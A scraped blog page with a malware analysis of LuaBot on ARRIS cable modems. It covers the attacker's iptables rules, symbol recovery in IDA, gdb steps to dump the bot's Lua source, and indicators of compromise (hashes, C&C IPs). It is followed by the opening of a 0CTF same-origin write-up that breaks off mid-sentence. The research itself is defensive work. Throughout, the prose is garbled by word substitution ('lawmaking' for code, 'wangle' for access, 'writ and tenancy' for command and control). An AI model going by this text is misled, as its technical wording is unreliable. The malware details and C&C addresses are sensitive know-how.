href="https://2.bp.blogspot.com/-P5BjHuqxlL4/V5VdZa5Y-xI/AAAAAAAABXw/nsilESC1atAcJt7PDcsNFV48_mCiozg0ACLcB/s1600/iptables.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="172" src="https://2.bp.blogspot.com/-P5BjHuqxlL4/V5VdZa5Y-xI/AAAAAAAABXw/nsilESC1atAcJt7PDcsNFV48_mCiozg0ACLcB/s640/iptables.png" width="640" /></a></div><div><span style="font-family: inherit;"><br /></span></div><div><span style="font-family: inherit;">These rules woodcut external exploit attempts to ARRIS services/backdoors, restricting wangle to networks controlled by the attacker.</span><br /><span style="font-family: inherit;"><br /></span><span style="font-family: inherit;">After setting up the rules, two spare binaries were transferred/started by the attacker. The first one, .sox.rslv (</span>889100a188a42369fd93e7010f7c654b) is a simple DNS query tool based on <a href="https://github.com/wongsyrone/shadowsocks-libev-libsodium-for-server/tree/master/libudns">udns 0.4</a>.</div><div><span style="font-family: inherit;"><br /></span><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://3.bp.blogspot.com/-QIz47ByOgYA/V9TLWGdxjnI/AAAAAAAABdc/m895J_BthuEq1Lw5mwldLMDj80u1pbvMgCLcB/s1600/udns.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="200" src="https://3.bp.blogspot.com/-QIz47ByOgYA/V9TLWGdxjnI/AAAAAAAABdc/m895J_BthuEq1Lw5mwldLMDj80u1pbvMgCLcB/s400/udns.png" width="400" /></a></div><span style="font-family: inherit;"><br /></span><span style="font-family: inherit;">The other binary, .sox (</span>4b8c0ec8b36c6bf679b3afcc6f54442a), sets the device's DNS servers to 8.8.8.8 and 8.8.4.4 and provides multiple tunneling functionalities including SOCKS/proxy, DNS and IPv6.</div><div><span style="font-family: inherit;"><br /></span><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://3.bp.blogspot.com/-fhTh0tBqQkY/V9Ta5BHly-I/AAAAAAAABeE/JhzTZ9beJokn2kRArqp9HwUcC3QeludtQCLcB/s1600/dns2.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="232" src="https://3.bp.blogspot.com/-fhTh0tBqQkY/V9Ta5BHly-I/AAAAAAAABeE/JhzTZ9beJokn2kRArqp9HwUcC3QeludtQCLcB/s640/dns2.PNG" width="640" /></a></div><span style="font-family: inherit;"><br /></span><span style="font-family: inherit;">Parts of the lawmaking resembles some&nbsp;<a href="http://code.taobao.org/p/sss-libev/src/trunk/shadowsocks-libev-master/">shadowsocks-libev</a>&nbsp;functionalities and there's an interesting reference to the <a href="https://www.threatcrowd.org/domain.php?domain=whrq.net">whrq[.]net domain</a>,&nbsp;which seems to be used as a dnscrypt gateway:</span><br /><span style="font-family: inherit;"><br /></span><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-zjS8g4oJiUI/V9TfxlHAb7I/AAAAAAAABes/axG66dVSxBgvolIZVWitxnK0OlCK0XlSgCLcB/s1600/whrq.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="318" src="https://1.bp.blogspot.com/-zjS8g4oJiUI/V9TfxlHAb7I/AAAAAAAABes/axG66dVSxBgvolIZVWitxnK0OlCK0XlSgCLcB/s400/whrq.png" width="400" /></a></div><br /><strike>All these binaries&nbsp;are used as auxiliary tools</strike> for the LuaBot's final stage, arm_puma5 (061b03f8911c41ad18f417223840bce0), which seems to be selectively installed on vulnerable subscription modems.<br /><br /><span style="font-family: inherit;"><b>UPDATE:&nbsp;</b>According to <a href="https://medium.com/@x0rz/interview-with-the-luabot-malware-author-731b0646fc8f">this interview</a> with the supposed malware author, "<i>reversers usually get it wrong and say there’s some modules for my bot, but those unquestionably are other bots, some routers are infected with several bots at once. My bot never had any binary modules and unchangingly is one big elf file and sometimes only small &lt;1kb size dropper</i></span>"<br /><div><br /></div></div><div><br /></div><div><b><span style="font-family: inherit;">Final Stage: LuaBot</span></b><br /><b><span style="font-family: inherit;"><br /></span></b>The malware's final stage is a 716KB ARMEB ELF binary, statically linked, stripped and compiled using the same Puma5 toolchain as the one I made misogynist on my <a href="https://github.com/bmaia/cross-utils/tree/master/armeb/puma5_toolchain">cross-utils</a>&nbsp;repository.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://3.bp.blogspot.com/-ysTcZMAJoVg/V5WWizi8nCI/AAAAAAAABYI/hn7fPLQUTt8Mn9EISr9v37dXmG-RSZ6cQCLcB/s1600/comment.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="228" src="https://3.bp.blogspot.com/-ysTcZMAJoVg/V5WWizi8nCI/AAAAAAAABYI/hn7fPLQUTt8Mn9EISr9v37dXmG-RSZ6cQCLcB/s400/comment.png" width="400" /></a></div><br />If we use strace to perform a dynamic wringer we can see the greetings from the bot's tragedian and the megacosm of a mutex (bbot_mutex_202613). Then the bot will start listening on port 11833 (TCP) and will try to contact the writ and tenancy server at &nbsp;80.87.205.92.</div><div><br /><script src="https://gist.github.com/bmaia/a3f976bb608d1212d9b955f46fe85014.js"></script> <br />In order to understand how the malware works, let's mix some transmission and dynamic analysis. Time to analyse the binary using IDA Pro and...<br /><br /><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody><tr><td style="text-align: center;"><a href="https://2.bp.blogspot.com/-YRG4NP8Yfm8/V5WaGxe2dvI/AAAAAAAABYc/R3bW2HMDIgg3pT5Hg62tQJCBwcSOyw6pwCLcB/s1600/confused-ida.gif" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="400" src="https://2.bp.blogspot.com/-YRG4NP8Yfm8/V5WaGxe2dvI/AAAAAAAABYc/R3bW2HMDIgg3pT5Hg62tQJCBwcSOyw6pwCLcB/s400/confused-ida.gif" width="400" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">Reversing stripped binaries<br /><br /></td></tr></tbody></table>The binaries are stripped and IDA Pro's&nbsp;F.L.I.R.T. didn't recognize standard function calls for our ARMEB binary. Instead of spending hours manually reviewing the code, we can use&nbsp;<a href="https://github.com/joxeankoret/diaphora">@matalaz</a>'s <a href="https://github.com/joxeankoret/diaphora">diaphora</a> diffing plugin to port all the symbols.<br /><br />First, we need to export the symbols from uClibC's Puma5 toolchain. Download the prebuilt toolchain <a href="https://github.com/bmaia/cross-utils/blob/master/armeb/puma5_toolchain/armeb-linux.tar.xz">here</a> and unshut the library "armeb-linux\ti-puma5\lib\libuClibc-0.9.29.so" using IDA Pro.SegregateFile/Script File (Alt+F7), load diaphora.py, select a location to Export IDA Database to SQLite, mark "Export only non-IDA generated functions" and hit OK.<br /><br />When it finishes, tropical the current IDA database and unshut the binary arm_puma5. Rerun the diaphora.py script and now segregate a SQLite database to unequal against:<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://3.bp.blogspot.com/-8gkrQVDGrCw/V5bEFgnJNZI/AAAAAAAABY0/s7lqZos7DXEl7WcdGtEOprG0f7bBdmZUQCLcB/s1600/diaphora1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="261" src="https://3.bp.blogspot.com/-8gkrQVDGrCw/V5bEFgnJNZI/AAAAAAAABY0/s7lqZos7DXEl7WcdGtEOprG0f7bBdmZUQCLcB/s400/diaphora1.png" width="400" /></a></div><br />After a while, it will show various tabs with all the unmatched functions in both databases, as well as the "Best", "Partial" and "Unreliable" matches tabs.<br /><br />Browse the "Best matches" tab, right click on the list and select "Import *all* functions" and segregate not to relaunch the diffing process when it finishes. Now throne to the "Partial matches" tab, delete everything with a low ratio (I removed everything unelevated 0.8), right click in the list and select "Import all data for sub_* function":<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://4.bp.blogspot.com/-VZbrcROHIFs/V5bXrD7FmkI/AAAAAAAABZg/KbrLVZPBGzk0D4Z7b5_VuLnziKt5yOVeACLcB/s1600/diaphora-partialmatches.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="228" src="https://4.bp.blogspot.com/-VZbrcROHIFs/V5bXrD7FmkI/AAAAAAAABZg/KbrLVZPBGzk0D4Z7b5_VuLnziKt5yOVeACLcB/s400/diaphora-partialmatches.png" width="400" /></a></div><br />The IDA strings window exhibit lots of information related to the Lua scripting language. For this reason, I moreover <a href="https://github.com/bmaia/cross-utils/tree/master/armeb/lua">cross-compiled Lua to ARMEB</a>, loaded the "lua" binary into IDA Pro and repeated the diffing process with <a href="https://github.com/joxeankoret/diaphora">diaphora</a>:<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-plEs6N4Uu70/V5beZhNKm8I/AAAAAAAABZ4/uadnfgrYFW0Fd3fdgTT7jfGkZAGZc7HCACLcB/s1600/strings.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="185" src="https://1.bp.blogspot.com/-plEs6N4Uu70/V5beZhNKm8I/AAAAAAAABZ4/uadnfgrYFW0Fd3fdgTT7jfGkZAGZc7HCACLcB/s640/strings.png" width="640" /></a></div><br />We're scrutinizingly washed-up now. If you google for some debug messages present on the code, you can find a deleted Pastebin that was cached by Google.<br /><span style="text-align: center;"><br /></span><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://3.bp.blogspot.com/-TMmPWI1aNuY/V5b1EoOTa2I/AAAAAAAABaw/K2pzTDM6wiYkK71FaP29aHIIF-PB5JOOwCLcB/s1600/pastebin.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="579" src="https://3.bp.blogspot.com/-TMmPWI1aNuY/V5b1EoOTa2I/AAAAAAAABaw/K2pzTDM6wiYkK71FaP29aHIIF-PB5JOOwCLcB/s640/pastebin.png" width="640" /></a></div><span style="text-align: center;"><br /></span><span style="text-align: center;">I downloaded the C lawmaking (evsocketlib.c), created some dummy structs for everything that wasn't included there and cross-compiled it to ARMEB too. And now what? Diffing then =)</span><br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://3.bp.blogspot.com/-pQNG4ThNExM/V5bx8j1oXsI/AAAAAAAABaU/TXUdIM2Q6OgfPHBLP6HkYt492uJeUrwOgCLcB/s1600/evs.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="140" src="https://3.bp.blogspot.com/-pQNG4ThNExM/V5bx8j1oXsI/AAAAAAAABaU/TXUdIM2Q6OgfPHBLP6HkYt492uJeUrwOgCLcB/s400/evs.png" width="400" /></a></div><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-O5UjSOyjCgg/V5byA-ozXVI/AAAAAAAABaY/yRTMDTSD9zI0mSy4AsHN21ZYf_YvctnkwCLcB/s1600/evs-compile.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="438" src="https://1.bp.blogspot.com/-O5UjSOyjCgg/V5byA-ozXVI/AAAAAAAABaY/yRTMDTSD9zI0mSy4AsHN21ZYf_YvctnkwCLcB/s640/evs-compile.png" width="640" /></a></div><br />Reversing the malware is way increasingly legible now. There's builtin Lua interpreter and some native lawmaking related to event sockets. The list of the botnet commands is stored at 0x8274: bot_daemonize, rsa_verify, sha1, fork, exec, wait_pid, pipe, evsocket, ed25519, dnsparser, struct, lpeg, evserver, evtimer and lfs:<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://2.bp.blogspot.com/-Wt0xwQFgiqs/V9YXisrr08I/AAAAAAAABfw/TA2lJWLRE68ZtuFraREzZonj7MXrOLk7wCLcB/s1600/botnet_commands.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="https://2.bp.blogspot.com/-Wt0xwQFgiqs/V9YXisrr08I/AAAAAAAABfw/TA2lJWLRE68ZtuFraREzZonj7MXrOLk7wCLcB/s400/botnet_commands.png" width="181" /></a></div><br />The bot starts by setting up the Lua environment, unpacks the lawmaking and then forks, waiting for instructions from theWritandTenancyserver. The malware tragedian packed the lua source lawmaking as a GZIP blob, making the unshortened reversing job easier for us, as we don't have to deal with Lua Bytecode.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://4.bp.blogspot.com/-lu-zbER9ock/V9YZcesFzAI/AAAAAAAABf8/vSyY9TTBr2A2yqkx6ZqK91HkEbJSHd5eQCLcB/s1600/gz.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="332" src="https://4.bp.blogspot.com/-lu-zbER9ock/V9YZcesFzAI/AAAAAAAABf8/vSyY9TTBr2A2yqkx6ZqK91HkEbJSHd5eQCLcB/s640/gz.png" width="640" /></a></div><br />The hulk at 0xA40B8 contains a standard GZ header with the last modified timestamp from 2016-04-18 17:35:34:<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-dVhuWtwyUhA/V9YZtjrj8lI/AAAAAAAABgE/z8tnRYSazTgLQ2W9Fkhxkp-CUmGQGly6gCLcB/s1600/gz_header.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="384" src="https://1.bp.blogspot.com/-dVhuWtwyUhA/V9YZtjrj8lI/AAAAAAAABgE/z8tnRYSazTgLQ2W9Fkhxkp-CUmGQGly6gCLcB/s640/gz_header.png" width="640" /></a></div><br />Another easy way to unpack the lua lawmaking is to nail the binary to your favorite debugger (<a href="https://github.com/hugsy/gef">gef</a>, of course) and dump the process memory (heap).<br /><br />First, reprinting <a href="https://github.com/bmaia/cross-utils/tree/master/armeb/gdb">gdbserver</a> to the subscription modem, run the malware (arm_puma5) and nail the debugger to the respective PID:<br /><div class="code">./gdbserver --multi localhost:12345 --attach 1058 </div><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://3.bp.blogspot.com/-2eYAAdYzNtA/V9T2klPdjiI/AAAAAAAABfI/_5XPd_dpCsMpJ5jAowYDGavdt-cKqA6aQCLcB/s1600/gef1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="263" src="https://3.bp.blogspot.com/-2eYAAdYzNtA/V9T2klPdjiI/AAAAAAAABfI/_5XPd_dpCsMpJ5jAowYDGavdt-cKqA6aQCLcB/s400/gef1.png" width="400" /></a></div><br />Then, start gef/GDB and nail it to the running server:<br /><div class="code">gdb-multiarch -q<br />set tracery arm<br />set endian big<br />set follow-fork-mode child<br />gef-remote 192.168.100.1:12345</div><div class="separator" style="clear: both; text-align: center;"><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://3.bp.blogspot.com/-TSbehu0ClXI/V9nt5YK-92I/AAAAAAAABjg/8Yz_cqc3uNUzR0UinNZ5vzLt3YbsvUGxACLcB/s1600/gef2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="245" src="https://3.bp.blogspot.com/-TSbehu0ClXI/V9nt5YK-92I/AAAAAAAABjg/8Yz_cqc3uNUzR0UinNZ5vzLt3YbsvUGxACLcB/s400/gef2.png" width="400" /></a></div><div class="separator" style="clear: both; text-align: center;"><br /></div>Lastly, list the memory regions and dump the heap:<br /><div class="code">vmmap<br />dump memory arm_puma5-heap.mem 0x000c3000 0x000df000 </div><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://3.bp.blogspot.com/-_ghmUhxIek8/V9T24sr6LsI/AAAAAAAABfQ/WNyzSRFib1cbefvak6b4YkEAbHIp9YfqwCLcB/s1600/gef-3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="107" src="https://3.bp.blogspot.com/-_ghmUhxIek8/V9T24sr6LsI/AAAAAAAABfQ/WNyzSRFib1cbefvak6b4YkEAbHIp9YfqwCLcB/s400/gef-3.png" width="400" /></a></div><div><br /></div><div>That's it, now you have the full source lawmaking from the LuaBot:</div><div><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://4.bp.blogspot.com/-uS4N29CODuY/V9T2-tgfPsI/AAAAAAAABfU/jjf3bLCAv5Ur5ya0CI23HOp2dQz2IXxuACLcB/s1600/gef-hex.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="310" src="https://4.bp.blogspot.com/-uS4N29CODuY/V9T2-tgfPsI/AAAAAAAABfU/jjf3bLCAv5Ur5ya0CI23HOp2dQz2IXxuACLcB/s640/gef-hex.png" width="640" /></a></div><div><br /></div>The LuaBot source lawmaking is well-balanced of several modules:<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://4.bp.blogspot.com/-TxIjFqHKSBI/V9YbX7zuLaI/AAAAAAAABgY/CICOLiBvE20hBjNERhKS-wRjfqgyfHxywCLcB/s1600/lua_file_list.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="261" src="https://4.bp.blogspot.com/-TxIjFqHKSBI/V9YbX7zuLaI/AAAAAAAABgY/CICOLiBvE20hBjNERhKS-wRjfqgyfHxywCLcB/s400/lua_file_list.png" width="400" /></a></div><br />The bot settings, including the DNS recurser and the CnC settings are hardcoded:<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://2.bp.blogspot.com/-xqhr4gKyZOE/V9YgHuR7UKI/AAAAAAAABhA/dxYB4jsnxUQPUYihYI1-Kdf1DySCTPPGwCLcB/s1600/luabot_cfg.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="301" src="https://2.bp.blogspot.com/-xqhr4gKyZOE/V9YgHuR7UKI/AAAAAAAABhA/dxYB4jsnxUQPUYihYI1-Kdf1DySCTPPGwCLcB/s320/luabot_cfg.PNG" width="320" /></a></div><br />The lawmaking is really well documented and it includes proxy checking functions and a masscan log parser:<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-20a8kaa4qIw/V9Ygrxb2_UI/AAAAAAAABhE/zft2xKza_Xw3BDm564-4VDMGRAJHWHstwCLcB/s1600/luabot_httpproxy.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="398" src="https://1.bp.blogspot.com/-20a8kaa4qIw/V9Ygrxb2_UI/AAAAAAAABhE/zft2xKza_Xw3BDm564-4VDMGRAJHWHstwCLcB/s400/luabot_httpproxy.PNG" width="400" /></a></div><br />Bot tragedian is seeding random with /dev/urandom (crypgtographers rejoice):<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://3.bp.blogspot.com/-VJhxGkwDJsE/V9Yim6_8j8I/AAAAAAAABhU/Gj8JZwrtzQIV_iD247LtdhAiB0StqWHgQCLcB/s1600/luabot_seedrandom.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="272" src="https://3.bp.blogspot.com/-VJhxGkwDJsE/V9Yim6_8j8I/AAAAAAAABhU/Gj8JZwrtzQIV_iD247LtdhAiB0StqWHgQCLcB/s400/luabot_seedrandom.PNG" width="400" /></a></div><br />LuaBot integrates an embedded JavaScript engine and executes scripts signed with the author's RSA key:<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://2.bp.blogspot.com/-i8HSkRO2CLk/V9YlltIN2II/AAAAAAAABhs/IoTTWamEAA8AIiiaDlo9NtMYioFxD6RvgCLcB/s1600/luabot_signedscript.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="356" src="https://2.bp.blogspot.com/-i8HSkRO2CLk/V9YlltIN2II/AAAAAAAABhs/IoTTWamEAA8AIiiaDlo9NtMYioFxD6RvgCLcB/s400/luabot_signedscript.PNG" width="400" /></a></div><br />Meterpreter is so 2000's, the V7 JavaScript interpreter is named shiterpreter:<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://2.bp.blogspot.com/-EK6T_yxjYNI/V9YqRNfWWAI/AAAAAAAABig/pb88FpKPHvkfYdpHtPa0w16niW-6uDYMwCLcB/s1600/luabot_shiterpreter.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="343" src="https://2.bp.blogspot.com/-EK6T_yxjYNI/V9YqRNfWWAI/AAAAAAAABig/pb88FpKPHvkfYdpHtPa0w16niW-6uDYMwCLcB/s400/luabot_shiterpreter.PNG" width="400" /></a></div><br />There's a tricky function named&nbsp;checkanus.penetrate_sucuri, on what seems to be some sort of shirk for Sucuri's Denial of Service (DDoS) Protection:<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://4.bp.blogspot.com/-zW5f7S4q0iw/V9YnlT6kZvI/AAAAAAAABiA/VSYAiP90SSUR-3dD296qy-gw4S6F4ShgACLcB/s1600/luabot_sucuri1.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="278" src="https://4.bp.blogspot.com/-zW5f7S4q0iw/V9YnlT6kZvI/AAAAAAAABiA/VSYAiP90SSUR-3dD296qy-gw4S6F4ShgACLcB/s400/luabot_sucuri1.PNG" width="400" /></a></div><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-FA7xScQhqMo/V9YnozKsfkI/AAAAAAAABiI/2RhEkzM2gKkJ6ZhujWA6YGAKthg7ptwoQCLcB/s1600/luabot_sucuri2.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="https://1.bp.blogspot.com/-FA7xScQhqMo/V9YnozKsfkI/AAAAAAAABiI/2RhEkzM2gKkJ6ZhujWA6YGAKthg7ptwoQCLcB/s400/luabot_sucuri2.PNG" width="297" /></a></div><br />LuaBot has its own lua resolver function for DNS queries:<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://2.bp.blogspot.com/-_eYtyegeWd0/V9YwMb7lgZI/AAAAAAAABjE/EZV40yNa4ac8QpFMTxWskmua6KKfSToNgCLcB/s1600/luabot_dns.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="328" src="https://2.bp.blogspot.com/-_eYtyegeWd0/V9YwMb7lgZI/AAAAAAAABjE/EZV40yNa4ac8QpFMTxWskmua6KKfSToNgCLcB/s400/luabot_dns.PNG" width="400" /></a></div><br />Most of the bot capabilities are in line with the ones described on the&nbsp;<a href="http://blog.malwaremustdie.org/2016/09/mmd-0057-2016-new-elf-botnet-linuxluabot.html">Malware Must Die! blogpost</a>. It's interesting to note that the IPs from the CnC server and iptables rules don't overlap, probably considering they're using variegated environments for variegated bot families (or they were simply updated).<br /><br />I did not analise the remote botnet structure, but the modular tideway and the interoperability of the malware indicates that there's a professional and ongoing effort.<br /><br /><b><br /></b><b>Conclusion</b><br /><b><br /></b></div><div>The analysed malware doesn't have any persistence mechanism to survive reboots. It wouldn't try to reflash the firmware or modify volatile partitions (NVRAM for example), but the first stage payload restricts remote wangle to the device using custom iptables rules.<br /><br />This is a quite interesting tideway considering they can quickly masscan the Internet and woodcut external wangle to those IoT devices and selectively infect them using the final stage payloads.<br /><br />On 2015, when I initially reported well-nigh the ARRIS backdoors, there were over <a href="https://twitter.com/bernardomr/status/667643475358318592">600.000 vulnerable ARRIS devices exposed on the Internet</a>&nbsp;and 490.000 of them had telnet services enabled:<br /><div class="separator" style="clear: both; text-align: center;"><a href="https://3.bp.blogspot.com/-6S4CIS6x8Tw/V9RZW6F-6TI/AAAAAAAABcc/x06OlEc1NGQ5O1I7bIIoUd-N4mrm2FGQgCLcB/s1600/arris-sep-2015-telnet.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="407" src="https://3.bp.blogspot.com/-6S4CIS6x8Tw/V9RZW6F-6TI/AAAAAAAABcc/x06OlEc1NGQ5O1I7bIIoUd-N4mrm2FGQgCLcB/s640/arris-sep-2015-telnet.png" width="640" /></a></div>If we perform the same query nowadays (September/2016) we can see that the number of exposed devices was reduced to approximately 35.000:<br /><div class="separator" style="clear: both; text-align: center;"><a href="https://3.bp.blogspot.com/-PZXChslVidQ/V9RXNG-E8xI/AAAAAAAABcM/YVsWE6a5ET0I-v8BAFAZTpwqRBhIvjD5wCLcB/s1600/arris-sep2016.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="442" src="https://3.bp.blogspot.com/-PZXChslVidQ/V9RXNG-E8xI/AAAAAAAABcM/YVsWE6a5ET0I-v8BAFAZTpwqRBhIvjD5wCLcB/s640/arris-sep2016.png" width="640" /></a></div>I know that the media coverage and the <a href="https://www.kb.cert.org/vuls/id/419568">security bulletins</a>&nbsp;contributed to that, but I wonder how much of those devices were infected and had external wangle restricted by some sort of malware...<br /><br /></div><div>The upper number of Linux devices with Internet-facing legalistic interfaces, the use of <a href="https://www.gnu.org/proprietary/proprietary-back-doors.html">proprietary Backdoors</a>, the lack of firmware updates and the ease to craft IoT exploits make them easy targets for online criminals.<br /><br /><div>IoT botnets are rhadamanthine a thing: manufacturers have to start towers secure and reliable products, ISPs need to start shipping updated devices/firmwares and the final user has to alimony his home devices patched/secured.</div><br />We need to find largest ways to detect, woodcut and contain this new trend. Approaches like the one from <a href="http://senr.io/">SENRIO</a>&nbsp;can help&nbsp;ISPs and Enterprises to have a largest visibility of their IoT ecosystems. Large scale firmware wringer can moreover contribute and provide a largest understanding of the security issues for those devices.<br /><br /><br /></div><div><b><span style="font-family: inherit;">Indicators of Compromise (IOCs)</span></b><br /><b><span style="font-family: inherit;"><br /></span></b><span style="font-family: inherit;">LuaBot ARMEB Binaries:</span></div><div><ul><li>drop (5deb17c660de9d449675ab32048756ed)</li><li>.nttpd (c867d00e4ed65a4ae91ee65ee00271c7)</li><li>.sox (4b8c0ec8b36c6bf679b3afcc6f54442a)</li><li>.sox.rslv (889100a188a42369fd93e7010f7c654b)</li><li>.arm_puma5 (061b03f8911c41ad18f417223840bce0)</li></ul><br />GCC Toolchains:<br /><ul><li>GCC: (Buildroot 2015.02-git-00879-g9ff11e0) 4.8.4</li><li>GCC: (GNU) 4.2.0 TI-Puma5 20100224</li></ul><br />Dropper and CnC IPs:<br /><ul><li>46.148.18.122</li><li>80.87.205.92</li></ul><div><br /></div>IP Ranges whitelisted by the Attacker:</div><div><ul><li>46.148.18.0/24</li><li>185.56.30.0/24</li><li>217.79.182.0/24</li><li>85.114.135.0/24</li><li>95.213.143.0/24</li><li>185.53.8.0/24</li></ul><div><br /></div></div></div>Bernardo Rodrigueshttp://www.blogger.com/profile/09470949514402700579noreply@blogger.com5tag:blogger.com,1999:blog-3296471108082693838.post-64729293269064900452016-03-13T21:01:00.003-03:002016-03-15T19:09:18.704-03:000CTF 2016 Write Up: Monkey (Web 4)The Chinese <a href="https://ctf.0ops.sjtu.cn/">0CTF</a> took place on March 12-13 and it was yet flipside fun CTF. I played with my teammates from <a href="https://ctftime.org/team/10288">TheGoonies</a> and we were ranked #48.<br /><br />I found the Web task "Monkey" particularly interesting: I solved it with the help from my friend <a href="https://twitter.com/danilonc">@danilonc</a>, but it took way longer than it should considering of some **Spoiler Alert** DNS glitches.Equalto the scoreboard status, approximately 35 teams were worldly-wise to solve it.<br /><br /><b>Task: Monkey (Web - 4pts)</b><br /><br /><div class="code">What is Same Origin Policy?<br /><br />you can test this problem on your local machine<br /><br />http://202.120.7.200</div><br />The running using receives a Proof-of-Work string and&nbsp;an wrong-headed URL, instructing a "monkey" to scan the inputted URL for 2 minutes.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://2.bp.blogspot.com/-8jR7_tVykpU/VuW3HqDcP9I/AAAAAAAABSs/tcF4PyKSD34sSemfUhbQr8NLd0xqF4kgQ/s1600/Screen%2BShot%2B2016-03-13%2Bat%2B15.32.39.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="302" src="https://2.bp.blogspot.com/-8jR7_tVykpU/VuW3HqDcP9I/AAAAAAAABSs/tcF4PyKSD34sSemfUhbQr8NLd0xqF4kgQ/s320/Screen%2BShot%2B2016-03-13%2Bat%2B15.32.39.png" width="320" /></a></div><b>Proof-of-Work</b><br /><br />Solving the proof-of-work is pretty straightforward. We had to generate random strings and compare the first 6 chars from its MD5 versus the challenge. The POW rencontre was increasingly cpu-intensive than normal, so the traditional bash/python one-liner ctf scripts would require some performance improvements.<br /><br /><a href="https://twitter.com/danilonc">@danilonc</a> had written a quick hack using Go to bruteforce and solve POW from older CTF challs, so we just slightly modified it:<br /><br /><script src="https://gist.github.com/bmaia/99052777c4046e974af0.js"></script> <br /><div class="separator" style="clear: both; text-align: left;">Solving the Proof-of-Work:</div><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-K0XXj5NiPK4/VuXFOsmTvoI/AAAAAAAABTY/E6nHMItMZ5MrIqn_wsOIvjG3e1HuzDcnA/s1600/Screen%2BShot%2B2016-03-13%2Bat%2B16.26.49.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="192" src="https://1.bp.blogspot.com/-K0XXj5NiPK4/VuXFOsmTvoI/AAAAAAAABTY/E6nHMItMZ5MrIqn_wsOIvjG3e1HuzDcnA/s400/Screen%2BShot%2B2016-03-13%2Bat%2B16.26.49.png" width="400" /></a></div><div class="separator" style="clear: both; text-align: left;"><b>Same-Origin-Policy and CORS</b></div><b><br /></b>The Same-Origin-Policy (SOP) deems pages having the same URI scheme, hostname and port as residing at the same-origin. If any of these three nature varies, the resource is in a variegated origin. Hence, if provided resources come from the same hostname, scheme and port, they can interact without restriction.<br /><br />If you try to use an XMLHttpRequest to send a request to a variegated origin, you can’t read the response. However, the request will still victorious at its destination. This policy prevents a malicious script on one page from obtaining wangle to sensitive data (both the header and the body) on flipside web page, on a variegated origin.<br /><br />For this particular CTF challenge, if the secret internal webpage had had an insecure CORS header like "Access-Control-Allow-Origin: *", we would be worldly-wise to retrieve its data with no effort. This, of course, was not the case.<br /><div><br /></div><b><br /></b><b>Bypassing the Same-Origin</b><br /><br />The flag was wieldy on an internal webserver hosted at http://127.0.0.1:8080/secret. The first thing we did was hooking the monkey's browser using <a 